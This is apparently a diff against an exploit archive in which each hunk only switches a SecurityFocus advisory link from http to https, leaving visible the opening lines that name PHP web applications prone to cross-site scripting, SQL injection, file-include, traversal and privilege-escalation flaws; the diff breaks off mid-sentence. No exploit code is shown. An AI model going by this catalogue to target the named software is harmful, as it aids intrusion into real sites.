--- a/exploits/php/webapps/28545.txt +++ b/exploits/php/webapps/28545.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28546.txt b/exploits/php/webapps/28546.txt index 66978cb87..c1073e9a6 100644 --- a/exploits/php/webapps/28546.txt +++ b/exploits/php/webapps/28546.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28547.txt b/exploits/php/webapps/28547.txt index de646b4c5..c93a7bda6 100644 --- a/exploits/php/webapps/28547.txt +++ b/exploits/php/webapps/28547.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28548.txt b/exploits/php/webapps/28548.txt index 5292f5d1d..03f654213 100644 --- a/exploits/php/webapps/28548.txt +++ b/exploits/php/webapps/28548.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28549.txt b/exploits/php/webapps/28549.txt index 857d41516..e388e0d18 100644 --- a/exploits/php/webapps/28549.txt +++ b/exploits/php/webapps/28549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28551.txt b/exploits/php/webapps/28551.txt index dfa7e8329..c45baf042 100644 --- a/exploits/php/webapps/28551.txt +++ b/exploits/php/webapps/28551.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28552.txt b/exploits/php/webapps/28552.txt index 5774ac6a9..5aa44f2c6 100644 --- a/exploits/php/webapps/28552.txt +++ b/exploits/php/webapps/28552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28554.txt b/exploits/php/webapps/28554.txt index 713b93921..5687c9c5f 100644 --- a/exploits/php/webapps/28554.txt +++ b/exploits/php/webapps/28554.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28556.txt b/exploits/php/webapps/28556.txt index aaacb0be5..48653116b 100644 --- a/exploits/php/webapps/28556.txt +++ b/exploits/php/webapps/28556.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28565.txt b/exploits/php/webapps/28565.txt index 678bde1fc..c5928aa38 100644 --- a/exploits/php/webapps/28565.txt +++ b/exploits/php/webapps/28565.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20001/info +source: https://www.securityfocus.com/bid/20001/info PHP Event Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28567.txt b/exploits/php/webapps/28567.txt index 8ae62b74f..60091b937 100644 --- a/exploits/php/webapps/28567.txt +++ b/exploits/php/webapps/28567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20010/info +source: https://www.securityfocus.com/bid/20010/info NX5Linkx is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28568.txt b/exploits/php/webapps/28568.txt index 9b505cd21..50339bbfd 100644 --- a/exploits/php/webapps/28568.txt +++ b/exploits/php/webapps/28568.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20011/info +source: https://www.securityfocus.com/bid/20011/info NX5Linkx is prone to an HTTP response-splitting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28569.txt b/exploits/php/webapps/28569.txt index 5562cd827..6ee0bafca 100644 --- a/exploits/php/webapps/28569.txt +++ b/exploits/php/webapps/28569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20020/info +source: https://www.securityfocus.com/bid/20020/info ActiveCampaign KnowledgeBuilder is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28571.txt b/exploits/php/webapps/28571.txt index 5a98f9616..69fbf176b 100644 --- a/exploits/php/webapps/28571.txt +++ b/exploits/php/webapps/28571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20024/info +source: https://www.securityfocus.com/bid/20024/info DCP-Portal is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting, SQL-injection, and remote file-include issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28572.txt b/exploits/php/webapps/28572.txt index f6a4ff340..39903a2dd 100644 --- a/exploits/php/webapps/28572.txt +++ b/exploits/php/webapps/28572.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20024/info +source: https://www.securityfocus.com/bid/20024/info DCP-Portal is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting, SQL-injection, and remote file-include issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28573.txt b/exploits/php/webapps/28573.txt index a7de82a3e..1bdc38908 100644 --- a/exploits/php/webapps/28573.txt +++ b/exploits/php/webapps/28573.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20024/info +source: https://www.securityfocus.com/bid/20024/info DCP-Portal is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting, SQL-injection, and remote file-include issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28574.txt b/exploits/php/webapps/28574.txt index f00cbb2a9..daf83c3d6 100644 --- a/exploits/php/webapps/28574.txt +++ b/exploits/php/webapps/28574.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20026/info +source: https://www.securityfocus.com/bid/20026/info Blojsom is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28575.txt b/exploits/php/webapps/28575.txt index 7ef79adc3..fabd83698 100644 --- a/exploits/php/webapps/28575.txt +++ b/exploits/php/webapps/28575.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20028/info +source: https://www.securityfocus.com/bid/20028/info PhotoPost Pro is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28580.txt b/exploits/php/webapps/28580.txt index 381a4c9d0..805976351 100644 --- a/exploits/php/webapps/28580.txt +++ b/exploits/php/webapps/28580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20040/info +source: https://www.securityfocus.com/bid/20040/info NextAge Cart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28581.txt b/exploits/php/webapps/28581.txt index 804c2bf5d..3af5967a4 100644 --- a/exploits/php/webapps/28581.txt +++ b/exploits/php/webapps/28581.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20048/info +source: https://www.securityfocus.com/bid/20048/info Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28582.txt b/exploits/php/webapps/28582.txt index 9a06fed97..20a28a538 100644 --- a/exploits/php/webapps/28582.txt +++ b/exploits/php/webapps/28582.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20048/info +source: https://www.securityfocus.com/bid/20048/info Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28583.txt b/exploits/php/webapps/28583.txt index 05be82de1..f7479714e 100644 --- a/exploits/php/webapps/28583.txt +++ b/exploits/php/webapps/28583.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20048/info +source: https://www.securityfocus.com/bid/20048/info Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28584.txt b/exploits/php/webapps/28584.txt index be285d81f..14de69cdb 100644 --- a/exploits/php/webapps/28584.txt +++ b/exploits/php/webapps/28584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20048/info +source: https://www.securityfocus.com/bid/20048/info Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28585.txt b/exploits/php/webapps/28585.txt index bac954064..1142594fd 100644 --- a/exploits/php/webapps/28585.txt +++ b/exploits/php/webapps/28585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20048/info +source: https://www.securityfocus.com/bid/20048/info Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28586.txt b/exploits/php/webapps/28586.txt index 85de8eb4b..1b4814c6b 100644 --- a/exploits/php/webapps/28586.txt +++ b/exploits/php/webapps/28586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20048/info +source: https://www.securityfocus.com/bid/20048/info Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28590.txt b/exploits/php/webapps/28590.txt index 71ac1985c..dfe01426f 100644 --- a/exploits/php/webapps/28590.txt +++ b/exploits/php/webapps/28590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20060/info +source: https://www.securityfocus.com/bid/20060/info Hitweb is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28591.php b/exploits/php/webapps/28591.php index 40a6b44ff..1e35e1bdf 100644 --- a/exploits/php/webapps/28591.php +++ b/exploits/php/webapps/28591.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20061/info +source: https://www.securityfocus.com/bid/20061/info PHP-Post is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting, SQL-injection, and remote file-include issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28592.txt b/exploits/php/webapps/28592.txt index 9b66088ad..91721a96c 100644 --- a/exploits/php/webapps/28592.txt +++ b/exploits/php/webapps/28592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20061/info +source: https://www.securityfocus.com/bid/20061/info PHP-Post is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting, SQL-injection, and remote file-include issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28594.txt b/exploits/php/webapps/28594.txt index ef227d837..a44121d0a 100644 --- a/exploits/php/webapps/28594.txt +++ b/exploits/php/webapps/28594.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20064/info +source: https://www.securityfocus.com/bid/20064/info The 'artmedic links' application is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28598.txt b/exploits/php/webapps/28598.txt index 02b550443..665674ede 100644 --- a/exploits/php/webapps/28598.txt +++ b/exploits/php/webapps/28598.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20081/info +source: https://www.securityfocus.com/bid/20081/info IDevSpot BizDirectory is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28599.txt b/exploits/php/webapps/28599.txt index 39bb33687..32b54fd3f 100644 --- a/exploits/php/webapps/28599.txt +++ b/exploits/php/webapps/28599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20084/info +source: https://www.securityfocus.com/bid/20084/info NixieAffiliate is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28601.txt b/exploits/php/webapps/28601.txt index a8ad80575..eeffd3e10 100644 --- a/exploits/php/webapps/28601.txt +++ b/exploits/php/webapps/28601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20090/info +source: https://www.securityfocus.com/bid/20090/info PT News is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28603.txt b/exploits/php/webapps/28603.txt index cc7b475e8..8b503bd69 100644 --- a/exploits/php/webapps/28603.txt +++ b/exploits/php/webapps/28603.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20104/info +source: https://www.securityfocus.com/bid/20104/info Innovate Portal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28604.txt b/exploits/php/webapps/28604.txt index f92a07eee..c69aa01ac 100644 --- a/exploits/php/webapps/28604.txt +++ b/exploits/php/webapps/28604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20106/info +source: https://www.securityfocus.com/bid/20106/info eSyndiCat is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28611.txt b/exploits/php/webapps/28611.txt index 188ce96cb..970784983 100644 --- a/exploits/php/webapps/28611.txt +++ b/exploits/php/webapps/28611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20115/info +source: https://www.securityfocus.com/bid/20115/info The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28612.txt b/exploits/php/webapps/28612.txt index 21440c536..f018e7709 100644 --- a/exploits/php/webapps/28612.txt +++ b/exploits/php/webapps/28612.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20115/info +source: https://www.securityfocus.com/bid/20115/info The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28613.txt b/exploits/php/webapps/28613.txt index 2efb831dd..7902f817c 100644 --- a/exploits/php/webapps/28613.txt +++ b/exploits/php/webapps/28613.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20115/info +source: https://www.securityfocus.com/bid/20115/info The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28614.txt b/exploits/php/webapps/28614.txt index 332cdce67..ff60c9a72 100644 --- a/exploits/php/webapps/28614.txt +++ b/exploits/php/webapps/28614.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20115/info +source: https://www.securityfocus.com/bid/20115/info The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28616.txt b/exploits/php/webapps/28616.txt index 6a13762e0..308b2fd45 100644 --- a/exploits/php/webapps/28616.txt +++ b/exploits/php/webapps/28616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20120/info +source: https://www.securityfocus.com/bid/20120/info A.I-Pifou is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28617.txt b/exploits/php/webapps/28617.txt index abf1acafa..22dedcae4 100644 --- a/exploits/php/webapps/28617.txt +++ b/exploits/php/webapps/28617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28618.txt b/exploits/php/webapps/28618.txt index e4734685a..11da9bac5 100644 --- a/exploits/php/webapps/28618.txt +++ b/exploits/php/webapps/28618.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28619.txt b/exploits/php/webapps/28619.txt index de2666a88..59dfad88e 100644 --- a/exploits/php/webapps/28619.txt +++ b/exploits/php/webapps/28619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28620.txt b/exploits/php/webapps/28620.txt index 237a17cfe..a623494ac 100644 --- a/exploits/php/webapps/28620.txt +++ b/exploits/php/webapps/28620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28621.txt b/exploits/php/webapps/28621.txt index 7a9a15850..58f2aa357 100644 --- a/exploits/php/webapps/28621.txt +++ b/exploits/php/webapps/28621.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28622.txt b/exploits/php/webapps/28622.txt index 748f7738a..544a2ce9d 100644 --- a/exploits/php/webapps/28622.txt +++ b/exploits/php/webapps/28622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28623.txt b/exploits/php/webapps/28623.txt index 206c812d6..594d493c9 100644 --- a/exploits/php/webapps/28623.txt +++ b/exploits/php/webapps/28623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28624.txt b/exploits/php/webapps/28624.txt index df443f366..c41796e7c 100644 --- a/exploits/php/webapps/28624.txt +++ b/exploits/php/webapps/28624.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28625.txt b/exploits/php/webapps/28625.txt index 986ec58d6..7129a91d2 100644 --- a/exploits/php/webapps/28625.txt +++ b/exploits/php/webapps/28625.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28626.txt b/exploits/php/webapps/28626.txt index db3a93c4a..10ba7093b 100644 --- a/exploits/php/webapps/28626.txt +++ b/exploits/php/webapps/28626.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28627.txt b/exploits/php/webapps/28627.txt index dcab0a6b8..86022ea29 100644 --- a/exploits/php/webapps/28627.txt +++ b/exploits/php/webapps/28627.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28628.txt b/exploits/php/webapps/28628.txt index 8382f9605..88231e4a0 100644 --- a/exploits/php/webapps/28628.txt +++ b/exploits/php/webapps/28628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28629.txt b/exploits/php/webapps/28629.txt index 92edc7584..141d03f6f 100644 --- a/exploits/php/webapps/28629.txt +++ b/exploits/php/webapps/28629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28630.txt b/exploits/php/webapps/28630.txt index 5c7a3b725..68c940ced 100644 --- a/exploits/php/webapps/28630.txt +++ b/exploits/php/webapps/28630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28631.txt b/exploits/php/webapps/28631.txt index 9dfc8bf0d..62a8e384d 100644 --- a/exploits/php/webapps/28631.txt +++ b/exploits/php/webapps/28631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28632.txt b/exploits/php/webapps/28632.txt index ad5871c27..a5619044b 100644 --- a/exploits/php/webapps/28632.txt +++ b/exploits/php/webapps/28632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28633.txt b/exploits/php/webapps/28633.txt index e90570543..836b76a69 100644 --- a/exploits/php/webapps/28633.txt +++ b/exploits/php/webapps/28633.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28634.txt b/exploits/php/webapps/28634.txt index 6c5810b3d..2e8be657d 100644 --- a/exploits/php/webapps/28634.txt +++ b/exploits/php/webapps/28634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28635.txt b/exploits/php/webapps/28635.txt index cd8233a5b..785e1aa48 100644 --- a/exploits/php/webapps/28635.txt +++ b/exploits/php/webapps/28635.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28636.txt b/exploits/php/webapps/28636.txt index 332e8d788..cace1c10c 100644 --- a/exploits/php/webapps/28636.txt +++ b/exploits/php/webapps/28636.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28637.txt b/exploits/php/webapps/28637.txt index 4a4cf958f..b68014d62 100644 --- a/exploits/php/webapps/28637.txt +++ b/exploits/php/webapps/28637.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28638.txt b/exploits/php/webapps/28638.txt index d35747162..e260f313f 100644 --- a/exploits/php/webapps/28638.txt +++ b/exploits/php/webapps/28638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28644.txt b/exploits/php/webapps/28644.txt index 33c730daf..c79646fc6 100644 --- a/exploits/php/webapps/28644.txt +++ b/exploits/php/webapps/28644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20149/info +source: https://www.securityfocus.com/bid/20149/info The Google Mini Search Appliance is prone to an information-disclosure vulnerability. diff --git a/exploits/php/webapps/28645.txt b/exploits/php/webapps/28645.txt index b60e4e62a..fffa29350 100644 --- a/exploits/php/webapps/28645.txt +++ b/exploits/php/webapps/28645.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20150/info +source: https://www.securityfocus.com/bid/20150/info CakePHP is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28646.txt b/exploits/php/webapps/28646.txt index bd540b6c7..bc34398ac 100644 --- a/exploits/php/webapps/28646.txt +++ b/exploits/php/webapps/28646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20153/info +source: https://www.securityfocus.com/bid/20153/info MySource products are prone to multiple input-validation vulnerabilities. Exploiting these issues will allow an attacker to manipulate the application into becoming an HTTP proxy and to conduct cross-site scripting attacks. diff --git a/exploits/php/webapps/28647.txt b/exploits/php/webapps/28647.txt index a4e936ff0..7d1837717 100644 --- a/exploits/php/webapps/28647.txt +++ b/exploits/php/webapps/28647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20155/info +source: https://www.securityfocus.com/bid/20155/info PLESK is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28658.txt b/exploits/php/webapps/28658.txt index 95393dc0f..4d387e465 100644 --- a/exploits/php/webapps/28658.txt +++ b/exploits/php/webapps/28658.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20160/info +source: https://www.securityfocus.com/bid/20160/info MyPhotos is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28660.php b/exploits/php/webapps/28660.php index 57dfc3c85..e7ffc35ae 100644 --- a/exploits/php/webapps/28660.php +++ b/exploits/php/webapps/28660.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20163/info +source: https://www.securityfocus.com/bid/20163/info cPanel is prone to a remote privilege-escalation vulnerability. diff --git a/exploits/php/webapps/28661.txt b/exploits/php/webapps/28661.txt index e399baac7..26354864e 100644 --- a/exploits/php/webapps/28661.txt +++ b/exploits/php/webapps/28661.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20170/info +source: https://www.securityfocus.com/bid/20170/info toendaCMS is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28662.txt b/exploits/php/webapps/28662.txt index e8bb0f513..08d3db60a 100644 --- a/exploits/php/webapps/28662.txt +++ b/exploits/php/webapps/28662.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20172/info +source: https://www.securityfocus.com/bid/20172/info Photostore is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28663.txt b/exploits/php/webapps/28663.txt index 9a62a957d..859b6d3ba 100644 --- a/exploits/php/webapps/28663.txt +++ b/exploits/php/webapps/28663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20172/info +source: https://www.securityfocus.com/bid/20172/info Photostore is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28664.txt b/exploits/php/webapps/28664.txt index c340666fd..ea6c21205 100644 --- a/exploits/php/webapps/28664.txt +++ b/exploits/php/webapps/28664.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20174/info +source: https://www.securityfocus.com/bid/20174/info Opial Audio/Visual Download Management is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28665.txt b/exploits/php/webapps/28665.txt index 2ba1c8fcb..e261db2e6 100644 --- a/exploits/php/webapps/28665.txt +++ b/exploits/php/webapps/28665.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20178/info +source: https://www.securityfocus.com/bid/20178/info WWWThreads is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28667.txt b/exploits/php/webapps/28667.txt index 2172e07ac..3613d998d 100644 --- a/exploits/php/webapps/28667.txt +++ b/exploits/php/webapps/28667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20202/info +source: https://www.securityfocus.com/bid/20202/info BirdBlog is prone to multiple cross-site scripting 